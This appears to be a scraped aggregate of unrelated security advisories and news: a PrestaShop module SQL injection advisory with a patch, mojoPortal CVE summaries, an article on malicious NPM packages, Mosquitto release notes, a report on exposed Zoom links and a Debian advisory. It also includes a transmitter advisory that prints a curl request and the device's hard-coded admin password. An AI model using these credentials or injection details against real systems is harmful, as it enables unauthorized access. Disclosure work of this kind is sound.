Presto Changeo testsitecreator up to v1.1.1 was discovered to contain a SQL injection vulnerability via the component disable_json.php.

**IMPORTANT NOTICE**: DO NOT REPORT VULNERABILITIES SOLELY TO THE AUTHOR OR MARKETPLACE.

We urge you to report any vulnerabilities directly to us. Our mission is to ensure the safety and security of the PrestaShop ecosystem. Unfortunately, many module developers may not always recognize or acknowledge the vulnerabilities in their code, whether due to lack of awareness, or inability to properly evaluate the associated risk, or other reasons.

Given the rise in professional cybercrime networks actively seeking out these vulnerabilities, it's crucial that any potential threats are promptly addressed and the community is informed. The most effective method to do this is by publishing a CVE, like the one provided below.

Should you discover any vulnerabilities, **please report them to us at: report\[@\]security-presta.org**.

Every vulnerability report helps make the community more secure, and we are profoundly grateful for any information shared with us.

In the module “Test Site Creator” (testsitecreator) from Presto Changeo for PrestaShop, a guest can perform SQL injection in affected versions.

**Summary**

*   **CVE ID**: CVE-2023-43980
*   **Published at**: 2023-09-28
*   **Platform**: PrestaShop
*   **Product**: testsitecreator
*   **Impacted release**: <= 1.1.1 (WARNING : see WARNING below)
*   **Product author**: Presto Changeo
*   **Weakness**: CWE-89
*   **Severity**: critical (9.8)

**Description**

The method TestSiteClass::TestSiteIsCreated() has sensitive SQL calls that can be executed with a trivial http call and exploited to forge a SQL injection.

**WARNING** : Author discontinue support of its module so you should no longer continue to use them and do not have time to confirm us the scope of impacted versions so it could impact newer versions than 1.1.1.

**CVSS base metrics**

*   **Attack vector**: network
*   **Attack complexity**: low
*   **Privilege required**: none
*   **User interaction**: none
*   **Scope**: unchanged
*   **Confidentiality**: high
*   **Integrity**: high
*   **Availability**: high

**Vector string**: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

**Possible malicious usage**

*   Obtain admin access
*   Remove data from the associated PrestaShop
*   Copy/paste data from sensitive tables to FRONT to expose tokens and unlock admins’s ajax scripts
*   Rewrite SMTP settings to hijack emails

**Patch from 1.1.1**

    --- 1.1.1/modules/testsitecreator/classes/TestSiteClass.php
    +++ XXXXX/modules/testsitecreator/classes/TestSiteClass.php
    ...
    		return (bool)Db::getInstance()->getRow('
    			SELECT * 
    			FROM `'._DB_PREFIX_.'testsitecreator`
    			WHERE `test_site_created` = 1
    -			'.(is_null($id_testsitecreator) ? 'AND `name_testsitecreator` = "'.$name_testsitecreator.'"' : 'AND `id_testsitecreator` = '.$id_testsitecreator).'
    +			'.(is_null($id_testsitecreator) ? 'AND `name_testsitecreator` = "'.pSQL($name_testsitecreator).'"' : 'AND `id_testsitecreator` = '.(int) $id_testsitecreator).'
    		');
    

**Other recommendations**

*   Since author discontinue support on its modules, it is recommended to delete the module.
*   Upgrade PrestaShop to the latest version to disable multiquery executions (separated by “;”) - be warned that this functionality **WILL NOT** protect your SHOP against injection SQL which uses the UNION clause to steal data.
*   Change the default database prefix ps_ with a new longer, arbitrary prefix. Nevertheless, be warned that this is useless against blackhats with DBA senior skills because of a design vulnerability in DBMS
*   Activate OWASP 942’s rules on your WAF (Web application firewall), be warned that you will probably break your backoffice and you will need to pre-configure some bypasses against this set of rules.

**Timeline**

Date

Action

2023-08-02

Issue discovered during a code review by TouchWeb.fr

2023-08-02

Contact Author to confirm versions scope by author

2023-08-27

Recontact Author to confirm versions scope by author

2023-08-27

Author replied us to stop communicating with him

2023-09-21

Request a CVE ID

2023-09-27

Received CVE ID

2023-09-28

Publish this security advisory

**Links**

*   Author product page
*   National Vulnerability Database

**DISCLAIMER:** _The French Association Friends Of Presta (FOP) acts as an intermediary to help hosting this advisory. While we strive to ensure the information and advice provided are accurate, FOP cannot be held liable for any consequences arising from reported vulnerabilities or any subsequent actions taken._

CVE-2023-43980: [CVE-2023-43980] Improper neutralization of SQL parameter in Presto Changeo - Test Site Creator module for PrestaShop

Cross Site Scripting vulnerability in mojoPortal v.2.7.0.0 allows a remote attacker to execute arbitrary code via the helpkey parameter in the Help.aspx component.

*   *   Actions
        
        Automate any workflow
        
    *   Packages
        
        Host and manage packages
        
    *   Security
        
        Find and fix vulnerabilities
        
    *   Codespaces
        
        Instant dev environments
        
    *   Copilot
        
        Write better code with AI
        
    *   Code review
        
        Manage code changes
        
    *   Issues
        
        Plan and track work
        
    *   Discussions
        
        Collaborate outside of code
        
    

*   *   GitHub Sponsors
        
        Fund open source developers
        
    
    *   The ReadME Project
        
        GitHub community articles
        
    
*   Pricing

**Search code, repositories, users, issues, pull requests...**

**Provide feedback**

**Saved searches****Use saved searches to filter your results more quickly**

Sign up

CVE-2023-44012: Vulnerability-Disclosures/2023/CVE-2023-44012 at main · Vietsunshine-Electronic-Solution-JSC/Vulnerability-Disclosures

An issue in mojoPortal v.2.7.0.0 allows a remote attacker to execute arbitrary code via a crafted script to the layout.master skin file at the Skin management component.

CVE-2023-44011: Vulnerability-Disclosures/2023/CVE-2023-44011 at main · Vietsunshine-Electronic-Solution-JSC/Vulnerability-Disclosures

By Waqas
There are over 17 million developers worldwide who use NPM packages, making it a lucrative target for cybercriminals.
This is a post from HackRead.com Read the original post: FortiGuard Labs Uncovers Series of Malicious NPM Packages Stealing Data

FortiGuard Labs has identified nine sets of malicious NPM packages, each with its own unique style of code.

FortiGuard Labs has uncovered a series of malicious packages concealed within NPM (Node Package Manager), the primary software repository for JavaScript developers. The researchers utilized a dedicated system designed to detect nefarious open-source packages across multiple ecosystems, including PyPI and NPM.

In this article, we delve into the world of these malicious packages, categorizing them based on their coding patterns and functionalities.

****Malicious NPM Packages That Steal Sensitive Data****

These malicious NPM packages steal sensitive data, such as system information, user credentials, and source code. The packages use install scripts to exfiltrate data to webhooks or file-sharing links.

The packages were found using a system dedicated to discovering malicious open-source packages. Fortinet has identified nine sets of malicious packages, each with its own unique style of code.

Most of these malicious packages employ install scripts that execute either before or after installation. When an NPM package is installed, these scripts are activated, opening the door to **potential threats**. Some of the most common techniques used by the malicious packages include:

*   **Using install scripts to exfiltrate data to webhooks or file-sharing links.**
*   **Scanning for sensitive files and directories, such as source code and configuration files.**
*   **Downloading and executing malicious executable files.**

Let’s take a closer look at these malicious packages and their intentions.

****The First Set: Unveiling the Hidden Agenda****

The initial group of packages hides an obfuscated index.js script. Despite the obfuscation, sharp eyes can detect suspicious strings that raise red flags. Upon further investigation, it becomes evident that these packages aim to extract sensitive data, including **Kubernetes** configurations, SSH keys, and other vital information, all without any prior notification.

****The Second Set: On the Prowl for Valuable Data****

The packages in the second set operate by initiating an HTTP GET request to a specified URL, complete with query parameters. They precisely scan for files and directories that may house sensitive information.

This script goes as far as permitting the unauthorized **extraction of critical developer data**, including source code and configuration files. Such files often contain valuable intellectual property and sensitive credentials, which are then archived and uploaded to an FTP server.

****The Third Set: A Discord Webhook Heist****

In this set, the index.mjs install script utilizes a Discord webhook to exfiltrate sensitive information, such as system details, usernames, and folder contents.

****The Fourth Set: A Different Approach to Data Theft****

Similar to the third set, these packages also rely on an index.mjs install script and a Discord webhook to steal sensitive data. However, they employ a distinct coding style for their mischievous activities.

****The Fifth Set: Targeting User Information****

This fifth set leverages an index.js install script to siphon off host and username information, as well as the contents of home directories, using a webhook.

****The Sixth Set: A Common Style of Attack****

This set, which is the most prevalent among the discovered packages, employs yet another index.js install script to extract sensitive information.

****The Seventh Set: A Vulnerable Connection****

According to FortiGuard Labs’ **report**, in this set, the packages utilize an installer.js install script to carry out the attack. However, a notable vulnerability exists as the ‘NODE\_TLS\_REJECT\_UNAUTHORIZED’ environment variable is set to ‘0,’ effectively disabling TLS certificate validation and potentially rendering the connection insecure and susceptible to **man-in-the-middle (MITM) attacks**.

****The Eighth Set: Automatic Execution of Suspicious Files****

This package goes to the extreme by automatically downloading and executing a potentially malicious executable file from a specified URL to the C:/ directory.

****The Ninth Set: Gathering Victim Information****

This package adopts a different scripting style to collect system information, including the victim’s public IP address, subsequently transmitting this data to a Discord webhook.

****Protection****

Fortinet has released signatures for its FortiGuard AntiVirus service to detect the malicious files identified in this report. The FortiGuard Web Filtering Service also detects and blocks the download URLs cited in this report.

The company also recommends that users take the following steps to protect themselves from these malicious packages:

*   **Keep your NPM packages up to date.**
*   **Use a trusted package manager.**
*   **Scan your projects for malicious dependencies.**
*   **Be wary of packages with unusual install scripts or behaviour**

****Conclusion: Vigilance Is Key****

The discovery of these malicious NPM packages is a reminder of the importance of vigilance when using open-source software. Organizations should take steps to protect themselves from these threats, such as keeping their NPM packages up to date, using a trusted package manager, scanning their projects for malicious dependencies, and being wary of packages with unusual install scripts or behaviour.

****_RELATED ARTICLES_****

1.  6 official Python repositories plagued with cryptomining malware
2.  CISA warns of trojanized versions of JavaScript library’s NPM package
3.  VMCONNECT: Malicious PyPI Package Mimicking Common Python Tools
4.  Crypto Discord Communities Targeted by Malicious Bookmarks & JavaScript

FortiGuard Labs Uncovers Series of Malicious NPM Packages Stealing Data

File Upload vulnerability in mojoPortal v.2.7.0.0 allows a remote attacker to execute arbitrary code via the File Manager function.

CVE-2023-44008: Vulnerability-Disclosures/2023/CVE-2023-44008 at main · Vietsunshine-Electronic-Solution-JSC/Vulnerability-Disclosures

In Mosquitto before 2.0.16, excessive memory is allocated based on malicious initial packets that are not CONNECT packets.

Version 2.0.16 of Mosquitto has been released. This is a security and bugfix release.

**Security**

*   CVE-2023-28366: Fix memory leak in broker when clients send multiple QoS 2 messages with the same message ID, but then never respond to the PUBREC commands.
*   CVE-2023-0809: Fix excessive memory being allocated based on malicious initial packets that are not CONNECT packets.
*   CVE-2023-3592: Fix memory leak when clients send v5 CONNECT packets with a will message that contains invalid property types.
*   Broker will now reject Will messages that attempt to publish to $CONTROL/.
*   Broker now validates usernames provided in a TLS certificate or TLS-PSK identity are valid UTF-8.
*   Fix potential crash when loading invalid persistence file.
*   Library will no longer allow single level wildcard certificates, e.g. \*.com

**Broker**

*   Fix $SYS messages being expired after 60 seconds and hence unchanged values disappearing.
*   Fix some retained topic memory not being cleared immediately after used.
*   Fix error handling related to the bind_interface option.
*   Fix std\* files not being redirected when daemonising, when built with assertions removed. Closes #2708.
*   Fix default settings incorrectly allowing TLS v1.1. Closes #2722.
*   Use line buffered mode for stdout. Closes #2354. Closes #2749.
*   Fix bridges with non-matching cleansession/local\_cleansession being expired on start after restoring from persistence. Closes #2634.
*   Fix connections being limited to 2048 on Windows. The limit is now 8192, where supported. Closes #2732.
*   Broker will log warnings if sensitive files are world readable/writable, or if the owner/group is not the same as the user/group the broker is running as. In future versions the broker will refuse to open these files.
*   mosquitto\_memcmp\_const is now more constant time.
*   Only register with DLT if DLT logging is enabled.
*   Fix any possible case where a json string might be incorrectly loaded. This could have caused a crash if a textname or textdescription field of a role was not a string, when loading the dynsec config from file only.
*   Dynsec plugin will not allow duplicate clients/groups/roles when loading config from file, which matches the behaviour for when creating them.
*   Fix heap overflow when reading corrupt config with "log\_dest file".

**Client library**

*   Use CLOCK\_BOOTTIME when available, to keep track of time. This solves the problem of the client OS sleeping and the client hence not being able to calculate the actual time for keepalive purposes. Closes #2760.
*   Fix default settings incorrectly allowing TLS v1.1. Closes #2722.
*   Fix high CPU use on slow TLS connect. Closes #2794.

**Clients**

*   Fix incorrect topic-alias property value in mosquitto\_sub json output.
*   Fix confusing message on TLS certificate verification. Closes #2746.

**Apps**

*   mosquitto\_passwd uses mkstemp() for backup files.
*   mosquitto_ctrl dynsec init will refuse to overwrite an existing file, without a race-condition.

CVE-2023-0809: Version 2.0.16 released.

Many organizations — including quite a few Fortune 500 firms — have exposed web links that allow anyone to initiate a Zoom video conference meeting as a valid employee. These company-specific Zoom links, which include a permanent user ID number and an embedded passcode, can work indefinitely and expose an organization’s employees, customers or partners to phishing and other social engineering attacks.

Many organizations — including quite a few Fortune 500 firms — have exposed web links that allow anyone to initiate a **Zoom** video conference meeting as a valid employee. These company-specific Zoom links, which include a permanent user ID number and an embedded passcode, can work indefinitely and expose an organization’s employees, customers or partners to phishing and other social engineering attacks.

Image: @Pressmaster on Shutterstock.

At issue is the **Zoom Personal Meeting ID** (PMI), which is a permanent identification number linked to your Zoom account and serves as your personal meeting room available around the clock. The PMI portion forms part of each new meeting URL created by that account, such as:

> zoom.us/j/5551112222

Zoom has an option to include an encrypted passcode within a meeting invite link, which simplifies the process for attendees by eliminating the need to manually enter the passcode. Following the previous example, such a link might look something like this:

> zoom.us/j/5551112222/pwd=jdjsklskldklsdksdklsdkll

Using your PMI to set up new meetings is convenient, but of course convenience often comes at the expense of security. Because the PMI remains the same for all meetings, anyone with your PMI link can join any ongoing meeting unless you have locked the meeting or activated Zoom’s Waiting Room feature.

Including an encrypted passcode in the Zoom link definitely makes it easier for attendees to join, but it might open your meetings to unwanted intruders if not handled responsibly. Particularly if that Zoom link is somehow indexed by Google or some other search engine, which happens to be the case for thousands of organizations.

Armed with one of these links, an attacker can create meetings and invite others using the identity of the authorized employee. And many companies using Zoom have made it easy to find recently created meeting links that include encrypted passcodes, because they have dedicated subdomains at Zoom.us.

Using the same method, KrebsOnSecurity also found working Zoom meeting links for **The National Football League** (NFL), **LinkedIn**, **Oracle**, **Humana**, **Disney**, **Warner Bros**, and **Uber**. And that was from just a few minutes of searching. And to illustrate the persistence of some of these Zoom links, Archive.org says several of the links were first created as far back as 2020 and 2021.

KrebsOnSecurity received a tip about the Zoom exposures from Charan Akiri, a researcher and security engineer at Reddit. In April 2023, this site featured research by Akiri showing that many public Salesforce websites were leaking private data, including banks and healthcare organizations (Akiri said Salesforce also had these open Zoom meeting links before he notified them).

The Zoom links that exposed working meeting rooms all had enabled the highlighted option.

Akiri said the misuse of PMI links, particularly those with passcodes embedded, can give unauthorized individuals access to meetings.

“These one-click links, which are not subject to expiration or password requirement, can be exploited by attackers for impersonation,” Akiri said. “Attackers exploiting these vulnerabilities can impersonate companies, initiating meetings unknowingly to users. They can contact other employees or customers while posing as the company, gaining unauthorized access to confidential information, potentially for financial gain, recruitment, or fraudulent advertising campaigns.”

Akiri said he built a simple program to crawl the web for working Zoom meeting links from different organizations, and so far it has identified thousands of organizations with these perfectly functional zombie Zoom links.

According to Akiri, here are several tips for using Zoom links more safely:

**Don’t Use Personal Meeting ID for Public Meetings:** Your Personal Meeting ID (PMI) is the default meeting that launches when you start an ad hoc meeting. Your PMI doesn’t change unless you change it yourself, which makes it very useful if people need a way to reach you. But for public meetings, you should always schedule new meetings with randomly generated meeting IDs. That way, only invited attendees will know how to join your meeting. You can also turn off your PMI when starting an instant meeting in your profile settings.

**Require a Passcode to Join:** You can take meeting security even further by requiring a passcode to join your meetings. This feature can be applied to both your Personal Meeting ID, so only those with the passcode will be able to reach you, and to newly scheduled meetings. To learn all the ways to add a passcode for your meetings, see this support article.

**Only Allow Registered or Domain Verified Users:** Zoom can also give you peace of mind by letting you know exactly who will be attending your meeting. When scheduling a meeting, you can require attendees to register with their email, name, and custom questions. You can even customize your registration page with a banner and logo. By default, Zoom also restricts participants to those who are logged into Zoom, and you can even restrict it to Zoom users whose email address uses a certain domain.

Further reading: How to Keep Uninvited Guests Out of Your Zoom Meeting

**Update 12:33 p.m.:** The list of affected organizations was updated, because several companies listed apparently only exposed links that let anyone connect to existing, always-on meeting rooms — not initiate and completely control a Zoom meeting. The real danger with the zombie links described above is that anyone can find and use them to create new meetings and invite others.

Don’t Let Zombie Zoom Links Drag You Down

Electrolink FM/DAB/TV Transmitter suffers from a disclosure of clear-text credentials in controlloLogin.js that can allow security bypass and system access.

    Electrolink FM/DAB/TV Transmitter (controlloLogin.js) Credentials DisclosureVendor: Electrolink s.r.l.Product web page: https://www.electrolink.comAffected version: 10W, 100W, 250W, Compact DAB Transmitter                  500W, 1kW, 2kW Medium DAB Transmitter                  2.5kW, 3kW, 4kW, 5kW High Power DAB Transmitter                  100W, 500W, 1kW, 2kW Compact FM Transmitter                  3kW, 5kW, 10kW, 15kW, 20kW, 30kW Modular FM Transmitter                  15W - 40kW Digital FM Transmitter                  BI, BIII VHF TV Transmitter                  10W - 5kW UHF TV Transmitter                  Web version: 01.09, 01.08, 01.07                  Display version: 1.4, 1.2                  Control unit version: 01.06, 01.04, 01.03                  Firmware version: 2.1Summary: Since 1990 Electrolink has been dealing with design andmanufacturing of advanced technologies for radio and televisionbroadcasting. The most comprehensive products range includes: FMTransmitters, DAB Transmitters, TV Transmitters for analogue anddigital multistandard operation, Bandpass Filters (FM, DAB, ATV,DTV), Channel combiners (FM, DAB, ATV, DTV), Motorized coaxialswitches, Manual patch panels, RF power meters, Rigid line andaccessories. A professional solution that meets broadcasters needsfrom small community television or radio to big government networks.Compact DAB Transmitters 10W, 100W and 250W models with 3.5"touch-screen display and in-built state of the art DAB modulator,EDI input and GPS receiver. All transmitters are equipped with astate-of-the art DAB modulator with excellent performances,self-protected and self-controlled amplifiers ensure trouble-freenon-stop operation.100W, 500W, 1kW and 2kW power range available on compact 2U and3U 19" frame. Built-in stereo coder, touch screen display andefficient low noise air cooling system. Available models: 3kW,5kW, 10kW, 15kW, 20kW and 30kW. High efficiency FM transmitterswith fully broadband solid state amplifiers and an efficientlow-noise air cooling system.FM digital modulator with excellent specifications, built-instereo and RDS coder. Digital deviation limiter together withASI and SDI inputs are available. These transmitters are readyfor ISOFREQUENCY networks.Available for VHF BI and VHF BIII operation with robust desingand user-friendly local and remote control. Multi-standard UHFTV transmitters from 10W up to 5kW with efficient low noise aircooling system. Analogue PAL, NTSC and Digital DVB-T/T2, ATSCand ISDB-Tb available.Desc: The device is vulnerable to a disclosure of clear-textcredentials in controlloLogin.js that can allow securitybypass and system access.Tested on: Mbedthis-Appweb/12.5.0           Mbedthis-Appweb/12.0.0Vulnerability discovered by Gjoko 'LiquidWorm' KrsticMacedonian Information Security Research & Development LaboratoryZero Science Lab - https://www.zeroscience.mk - @zeroscienceAdvisory ID: ZSL-2023-5790Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5790.php30.06.2023--C:\>curl -s "http://192.168.150.77:8888/controlloLogin.js"function verifica() {        var user = document.getElementById('user').value;        var password = document.getElementById('password').value;        //alert(user);        if(user=='admin' && password=='cozzir'){                SetCookie('Login','OK',exp);                window.location.replace("FrameSetCore.html");        }else{                SetCookie('Login','NO',exp);                window.location.replace("login.html");        }}

Electrolink FM/DAB/TV Transmitter (controlloLogin.js) Credential Disclosure

Debian Linux Security Advisory 5510-1 - Clement Lecigne discovered a heap-based buffer overflow in libvpx, a multimedia library for the VP8 and VP9 video codecs, which may result in the execution of arbitrary code if a specially crafted VP8 media stream is processed.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5510-1                   security@debian.orghttps://www.debian.org/security/                     Salvatore BonaccorsoSeptember 29, 2023                    https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : libvpxCVE ID         : CVE-2023-5217Debian Bug     : 1053182Clement Lecigne discovered a heap-based buffer overflow in libvpx, amultimedia library for the VP8 and VP9 video codecs, which may result inthe execution of arbitrary code if a specially crafted VP8 media streamis processed.For the oldstable distribution (bullseye), this problem has been fixedin version 1.9.0-1+deb11u1.For the stable distribution (bookworm), this problem has been fixed inversion 1.12.0-1+deb12u1.We recommend that you upgrade your libvpx packages.For the detailed security status of libvpx please refer to its securitytracker page at:https://security-tracker.debian.org/tracker/libvpxFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQKTBAEBCgB9FiEERkRAmAjBceBVMd3uBUy48xNDz0QFAmUXPQxfFIAAAAAALgAoaXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldDQ2NDQ0MDk4MDhDMTcxRTA1NTMxRERFRTA1NENCOEYzMTM0M0NGNDQACgkQBUy48xNDz0RFDA/9GmZkMOfqEBNeItASvUeQAbPu9w7hh/Ah/Ox9gSFZMvD5QmGTs6Zp8lZYTmOKS2Ls1rgQnfM/c+dm6Le4H9e+EtGYvLI0P6KjIk3T+rA+55os3WoUE99KJsZrj0AZM0jsmaQVuV1MbJIJSGo6a49qRkSIF4eS7/rws8xImu73EgcPQiWep70kF8/idqnYYqFEKJwT3Oxp2h4zYLM8Jqt8ji4caTHle20rcQ1tdOBCcqDWH87aNk1kqhWELe281K7sDVYlpyIGSZRsvHbTusESlvp+92sRIQPRDdpMMkSgACBDcHpfCHiJDofDDn+6Z4zA5XRxHOKlHvYvrg9lDSA1eu9V7oaR2YoBRfIcwd4HxB535FjJRNDGtt+0thJnuv+zjiA2yK/GTBju52q+96qGcXhPrGOZiQeth4SdxVnK3FKc3lB6HbMgs4ZERZNhs7AJ4I7pnyX6d8Zux3kPjejrdvBOFT8L+gNYzYn0tkcKHdpK2Xj0OMKboDLFxw26i8GgNb9RUht6Seb1dk2bnel2fJ+rqgxkltpVuTIFjQ942YtHm/a9xj6FLK3D6CtX1masIZ53uo51k2qWAGJWUqovasIQQHBUeOHgFHw+lHNHNlSsiblu6xc9y4B42vpozR449Q3volOr7t7oWv/pmsqrd48ByYXj7NESzD/bm4uOo9E==NrxQ-----END PGP SIGNATURE-----

Debian Security Advisory 5510-1

jSQL Injection is a lightweight application used to find database information from a distant server. jSQL Injection is also part of the official penetration testing distribution Kali Linux and is included in various other distributions like Pentest Box, Parrot Security OS, ArchStrike and BlackArch Linux. This is the source code release.

Tag

#js